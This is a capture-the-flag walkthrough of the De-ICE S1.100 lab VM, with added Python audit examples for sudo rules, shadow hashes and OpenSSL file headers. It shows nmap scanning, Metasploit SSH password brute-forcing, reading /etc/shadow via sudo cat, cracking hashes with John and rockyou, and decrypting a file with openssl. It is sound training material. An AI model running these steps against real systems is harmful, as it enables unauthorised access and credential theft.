De-ICE S1.100 Walkthrough

While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple: each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post-exploitation from some of the challenges in De-ICE. All of the spoilers are kept in the walkthrough section so as not to ruin the pen-testing fun. De-ICE S1.100 was the first capture-the-flag style challenge I ever did. I think I got it from 2600 Magazine, so it holds a special place in my heart. I would originally have done this using BackTrack or PHLAK; PHLAK still has the best Tux logo of any distro, RIP PHLAK. I lost my original notes, so this one is brand new instead of a few years old like the other versions will be. Have fun, and hopefully these are helpful.

De-ICE S1.100

Scenario: The scenario for this LiveCD is that the CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP: 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black-box test. Since I am running this in a local VMware environment, speed isn’t an issue, so -T5 it is. I also want to do OS detection and service enumeration, so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out, I always begin by looking for low-hanging fruit. Since the FTP service looks to be broken based on the Nmap scan results, we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Mary (marym@herot.net)
Pat Patrick (patrickp@herot.net)
Terry Thompson (thompsont@herot.net)
Ben Benedict (benedictb@herot.net)
Erin Gennieg (genniege@herot.net)
Paul Michael (michaelp@herot.net)
Ester Long (longe@herot.net)
Adam Adams (adamsa@herot.net)
Bob Banter (banterb@herot.net)
Chad Coffee (coffeec@herot.net)

This is where it helps to have either been a sysadmin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last> and <first initial><last>. I’ve also seen <employee ID>, <first><last initial>, and, worst of all, <first 4 of last><first 3 of first>. Because the email addresses use <last><first initial>, we will include that convention alongside the other two, and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use Metasploit to do the initial check for weak SSH passwords. You can set your options differently; this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true
run

Look at that! There is nothing better than a shell, and you will never forget the first one you get. Mine was an unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now, so let’s see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet, since on Linux and Unix systems it is the group that is allowed to run the su command. aadams is a member of the wheel group, so we will try to brute-force that password, again using Metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*
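
As an added check that is not part of the original walkthrough, the Python audit below parses sudo -l output like the lines above and flags what the NOEXEC tag cannot fix: a root-run file reader such as cat or more reads any file, /etc/shadow included, because NOEXEC only prevents the program from spawning children. The sample input is constructed from the output above.

```python
import re
from typing import Dict, List

# Constructed sample: the rule lines printed by sudo -l above.
SAMPLE_SUDO_L = """\
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*
"""

# Programs whose job is to print file contents. Run as root they read any file, /etc/shadow
# included; NOEXEC only stops them from spawning child processes, so it does not help here.
FILE_READERS = {"cat", "more", "less", "head", "tail", "tac", "nl", "od", "strings"}

# One sudo -l rule line: "(runas) TAG: [!]command args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<neg>!?)(?P<cmd>\S+)(?P<args>.*)$"
)

def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Turn sudo -l rule lines into dicts; banner and prompt lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "tags": m.group("tags").replace(":", " ").split(),   # e.g. ["NOEXEC"]
            "negated": m.group("neg") == "!",
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules

def audit_sudo_rules(text: str) -> List[str]:
    """One finding per allow-rule that hands the user a root-level file reader."""
    findings = []
    for r in parse_sudo_l(text):
        if r["negated"]:
            continue  # a '!' entry denies; on its own it grants nothing
        program = str(r["cmd"]).rsplit("/", 1)[-1]
        if r["runas"] in ("root", "ALL") and program in FILE_READERS:
            findings.append(f"{r['cmd']} as {r['runas']}: reads any file; NOEXEC does not limit this")
    return findings
```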

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can attack shadow files directly, so let’s try it using the rockyou wordlist. The first command runs single-crack mode, a simple set of rules that looks for easy passwords (basically so you don’t have to find bbanter again); the second runs the wordlist.

john --single de-iceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -
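
An added example, not from the original post: a Python audit over shadow lines like those above that classifies each password field by its crypt(3) prefix. All four real accounts use md5crypt ($1$), a fast hash, which is why a single rockyou pass finished them; the svc and ops lines are constructed for contrast.

```python
from typing import Dict, List

# The shadow lines shown above plus two constructed entries (svc: empty field, ops: sha512crypt).
SAMPLE_SHADOW = """\
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
svc::13550:0:99999:7:::
ops:$6$constructedsalt$constructedhash:13550:0:99999:7:::
"""
# crypt(3) prefix -> scheme. md5crypt ($1$) and DES are fast: one wordlist pass is all John needed.
HASH_SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}

def classify_hash(field: str) -> str:
    """Name the scheme of one shadow password field."""
    if field == "":
        return "empty"      # no password at all
    if field.startswith(("*", "!")):
        return "locked"     # nothing can match this field, so no password login
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"   # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"

def parse_shadow(text: str) -> List[Dict[str, str]]:
    """Keep user, password field, last-change day and max age from each 9-field line."""
    entries = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) < 9:
            continue
        entries.append({"user": f[0], "hash": f[1], "lastchg": f[2], "max": f[4]})
    return entries

def audit_shadow(text: str) -> List[str]:
    """One finding per account whose field is empty or hashed with a weak scheme."""
    findings = []
    for e in parse_shadow(text):
        scheme = classify_hash(e["hash"])
        if scheme == "empty":
            findings.append(f"{e['user']}: empty password field")
        elif scheme in ("md5crypt", "descrypt"):
            findings.append(f"{e['user']}: {scheme} hash, cheap to crack offline")
    return findings
```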

Now that we are root, let’s look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc; google that. I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

Try googling the Salted__n string and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption, and second, after some research we know that the file is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10
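
To make the Salted__ clue concrete, here is an added example (not from the original page) that recognises the OpenSSL enc header and reproduces the legacy key derivation such files used; the trailing n that strings printed after Salted__ is simply the first salt byte. The blob is constructed, and the AES decryption itself is left to openssl as above.

```python
import hashlib
from typing import Tuple

MAGIC = b"Salted__"  # first 8 bytes of every salted `openssl enc` output (salting is the default)

# Constructed stand-in for salary_dec2003.csv.enc: magic, an 8-byte salt, two blocks of ciphertext.
SAMPLE_ENC = MAGIC + bytes(range(1, 9)) + bytes(32)

def is_openssl_enc(blob: bytes) -> bool:
    """True when the blob carries the OpenSSL salted header (what strings showed as Salted__n:
    the n was just the first printable byte of the salt that follows the magic)."""
    return len(blob) >= 16 and blob[:8] == MAGIC

def split_openssl_enc(blob: bytes) -> Tuple[bytes, bytes]:
    """Return (salt, ciphertext) from an OpenSSL 'Salted__' file; raise on anything else."""
    if not is_openssl_enc(blob):
        raise ValueError("not an OpenSSL 'Salted__' container")
    return blob[8:16], blob[16:]

def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 16, iv_len: int = 16) -> Tuple[bytes, bytes]:
    """Legacy OpenSSL EVP_BytesToKey: D1 = MD5(pw||salt), Di = MD5(D(i-1)||pw||salt), one iteration,
    output D1||D2||... . MD5 was the enc digest of that era (OpenSSL 1.1.0 moved to SHA-256) and
    -pbkdf2 did not exist yet. For aes-128-cbc the first 16 bytes are the key, the next 16 the IV;
    a single MD5 per candidate is why such a file is only as strong as its passphrase."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.md5(prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]

def key_material(blob: bytes, password: bytes) -> Tuple[bytes, bytes, bytes]:
    """Everything an AES-128-CBC decryptor needs for this container: (key, iv, ciphertext)."""
    salt, ciphertext = split_openssl_enc(blob)
    key, iv = evp_bytes_to_key(password, salt)
    return key, iv, ciphertext
```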

That is certainly sensitive data! We’ve got all the flags; time to call it a day.
